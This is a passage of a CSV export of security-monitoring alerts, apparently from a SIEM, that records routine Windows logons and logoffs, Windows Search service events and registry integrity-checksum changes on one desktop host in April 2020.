+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:25:51.123",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:25:51.091",3,"The database engine attached a database",,"""SearchIndexer (5760,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). 
(Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:002B:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000203 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.008152 -0.003156 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:40, WS:120K # 0K, PF:148K # 0K, P:148K) +[4] 0.000119 +J(0) +[5] - +[6] - +[7] - +[8] 0.006284 -0.001723 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.010427 -0.000233 (5) CM -0.009965 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:68, WS:268K # 0K, PF:260K # 112K, P:260K) +[10] 0.000651 -0.000554 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000014 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:25:51.029",3,"The database engine is starting a new instance",,"""SearchIndexer (5760,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:25:46.060",5,"The database engine stopped an instance",,"""SearchIndexer (4572,T,97) Windows: The database engine stopped the instance (0). 
+ +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000010 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000025 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.001946 -0.001768 (2) CM +J(CM:2, PgRf:13, Rd:0/0, Dy:0/24, Lg:662/15) +M(C:0K, Fs:14, WS:56K # 0K, PF:0K # 0K, P:0K) +[4] 0.000008 +J(0) +[5] 0.054981 -0.001984 (58) CM -0.018642 (7) WT +J(CM:58, PgRf:0, Rd:0/58, Dy:0/0, Lg:0/0) +M(C:0K, Fs:476, WS:488K # 0K, PF:0K # 0K, P:0K) +[6] 0.001912 +J(0) +M(C:0K, Fs:1, WS:-2312K # 0K, PF:-6760K # 0K, P:-6760K) +[7] 0.000011 +J(0) +[8] 0.009955 -0.005809 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3078/2) +M(C:0K, Fs:26, WS:4K # 0K, PF:104K # 0K, P:104K) +[9] 0.000409 -0.000377 (2) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000003 +J(0) +[11] 0.005441 -0.004173 (2) WT +J(0) +[12] 0.000040 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000348 +J(0) +M(C:0K, Fs:0, WS:0K # 0K, PF:4K # 0K, P:4K) +[14] 0.000051 +J(0) +M(C:0K, Fs:0, WS:-176K # 0K, PF:-184K # 0K, P:-184K) +[15] 0.000003 +J(0).""" +"Apr 24, 2020 @ 13:25:45.998",3,"The Windows Search Service stopped normally",,"""Windows Search Service stopped normally. +""" +"Apr 24, 2020 @ 13:25:12.279",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '0d61dacf49c4b7682f45fff7f8f57479' +New md5sum is : '796cc5e23fc204228dd56503a66aa1bb' +Old sha1sum was: '71a31e06fb81f2dcbcdf75c75730b24491f00526' +New sha1sum is : '40ac1475be0431bb98a411f5452651252c4e21e3' +", +"Apr 24, 2020 @ 13:25:12.264",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '6ea2dee3d2bb35e8d704d196aedd6a76' +New md5sum is : 'bf956c5aed134ca1bb89a65648982482' +Old sha1sum was: '3bf6639fb706c11a88f9ee628fac8040d19fe6e6' +New sha1sum is : '720f00e68ce736c9b6d51dd40b56e82fb61e8d8a' +", +"Apr 24, 2020 @ 13:25:08.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:25:08.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:59.451",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f5e14498d88793ab9e47ba95008e4f35' +New md5sum is : '329ec3570a2953823519c93ae41cfdd7' +Old sha1sum was: '572aa3d10a303409c35a7f5afc5aaacefa8eabdd' +New sha1sum is : '110906058263ebb96cddf57a2c0ec6e23fe88017' +", +"Apr 24, 2020 @ 13:24:59.436",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'bf02f240281a1be47db753d1369bc887' +New md5sum is : 'd5c73bd526d32db32f836bf62cd41e08' +Old sha1sum was: '7f27010184bfe5915bac77ef2d4b82c97b694471' +New sha1sum is : '9d2344e17ff025bdec81b53475f19617d5b1519d' +", +"Apr 24, 2020 @ 13:24:58.919",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '92492b6125d7a64a6c867269318db81a' +New md5sum is : 'd214e1c99f049d2e5a4f7f5c293113d9' +Old sha1sum was: '95e95e5c4e1f969e302d45ad055d83e5811ca397' +New sha1sum is : '6942a4383d9a87a8db70eb1102e33fe4494b4782' +", +"Apr 24, 2020 @ 13:24:56.450",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_42bf6' was added. 
+", +"Apr 24, 2020 @ 13:24:56.435",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:55.188",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:55.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:53.859",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +", +"Apr 24, 2020 @ 13:24:52.342",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '25ef42efe37ad3eed184fd9bb31305d4' +New md5sum is : '2ca97e7a7da354ebc7e5aecb4fd0dd74' +Old sha1sum was: '4aa3eb6eb04b0d62d1a922458a12321e137ff48b' +New sha1sum is : '19f8d989d00dbb71464984cf5348341557224c0b' +", +"Apr 24, 2020 @ 13:24:47.857",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '106c676c812191a74d1c845f04603231' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '935b4cfc84744b913c948f1140563c880fa44307' +", +"Apr 24, 2020 @ 13:24:45.638",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
+Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : 'abe41aab895e504aa874d1b2b8792e94' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '9daf66238ba18f6f989346a0d4ba77fa2e949329' +", +"Apr 24, 2020 @ 13:24:45.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 13:24:41.685",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : '2ca0234a1640c58e3cf365df8754d248' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '7a25eda1526e7a85edeb507dbb982f86dbe534cf' +", +"Apr 24, 2020 @ 13:24:39.592",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:35Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:24:38.372",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:38.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:37.920",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:37.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\Security' was added. 
+", +"Apr 24, 2020 @ 13:24:36.560",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:36.544",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:36.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '50e564d651df4ed3711c530cb99d635a' +New md5sum is : '8879c1edeb0f0361bd37d770e7639bb2' +Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda' +New sha1sum is : '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +", +"Apr 24, 2020 @ 13:24:32.451",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. +Old md5sum was: 'b58c019384b3299402dbe5a0e22d2728' +New md5sum is : 'dc2df5dbbab1052bb3dc7682d9824775' +Old sha1sum was: 'adf5c3a1c0ff6a1ecdcd328f5d2ad52bb15b804a' +New sha1sum is : '4f8a48eef364efe98f3530d61a38ca5a604a69cf' +", +"Apr 24, 2020 @ 13:24:31.185",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +", +"Apr 24, 2020 @ 13:24:29.844",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6' was added. +", +"Apr 24, 2020 @ 13:24:29.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6\TriggerInfo\0' was added. 
+", +"Apr 24, 2020 @ 13:24:29.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:24:25.861",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'f93d80905ae8d4f7b3b1d14093e01cfb' +New md5sum is : 'da625c8cf22cc0a4471299dbe03060f6' +Old sha1sum was: '76dfbf0000655365da25fcaeae59a5577fea6d3e' +New sha1sum is : '4c16ffbbf8910ea5a4e1b2691c06b4ab9145d730' +", +"Apr 24, 2020 @ 13:24:19.015",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '1c6e2319780c0264f929f3c3433add82' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'f924403989ef2de336c156640b73fb0db5024306' +", +"Apr 24, 2020 @ 13:24:07.920",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '318460bc67692e1abeb6ac8620e2d5d2' +New md5sum is : '91bd294bc9340f876221b0364846313c' +Old sha1sum was: 'f3d4f1d8d84044bd1af1d2710eba79efdc96081d' +New sha1sum is : '05071c4f129dc58b432f2c6efee6e5e77e508fb7' +", +"Apr 24, 2020 @ 13:24:06.788",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:23:59.998",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: 'ceb071f7c3931d375ab5d39f59ceb095' +New md5sum is : 'b69fb06bf4f8bcc8374fe205ab23bb82' +Old sha1sum was: 'e67a17f8a2b27be4d2f41ac9baaed61e4f01e5e4' +New sha1sum is : '334dc05d67cd44aa3f53ce819fe13797e33e765f' +", +"Apr 24, 2020 @ 13:23:58.575",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:58.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:58.467",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:58.452",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.877",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:57.870",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.234",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6' was added. 
+", +"Apr 24, 2020 @ 13:23:57.221",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:57.014",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:56.970",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:53.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:53.081",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:52.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:52.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:52.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:52.780",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:50.404",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:50.388",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:23:50.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\3' was added. 
+", +"Apr 24, 2020 @ 13:23:50.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:23:50.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:23:50.325",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:23:50.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:49.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:49.294",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:48.997",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '8bb6c0956c2766c58c1a9a1efc45a28c' +New md5sum is : 'd77005a972ae3949d5bcdf863c022b59' +Old sha1sum was: '9987f79cd34a26b46e6fd604087e2270b8c49cf1' +New sha1sum is : '0527bcf7219af58f3e0dbc5775726f1f2f3b20ae' +", +"Apr 24, 2020 @ 13:23:48.982",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '105e7d5045a9d20c4e9bfe6e31c4d5f4' +New md5sum is : '98aad82331612821f04993f8d4e943fc' +Old sha1sum was: '3b1edbab1cd6af7b0103a1e985a900a15cd3d2f1' +New sha1sum is : '818d873bfd9a6f8062c754be90dfa34ae33223eb' +", +"Apr 24, 2020 @ 13:23:46.279",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_42bf6' was added. +", +"Apr 24, 2020 @ 13:23:46.250",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_42bf6\Security' was added. +", +"Apr 24, 2020 @ 13:23:03.182",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:58Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:22:34.102",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 13:22:33.984",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:19.589",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x69243 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:22:19.511",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x6926C + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 13:22:19.458",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x6926C + Linked Logon ID: 0x69243 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:19.430",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x69243 + Linked Logon ID: 0x6926C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
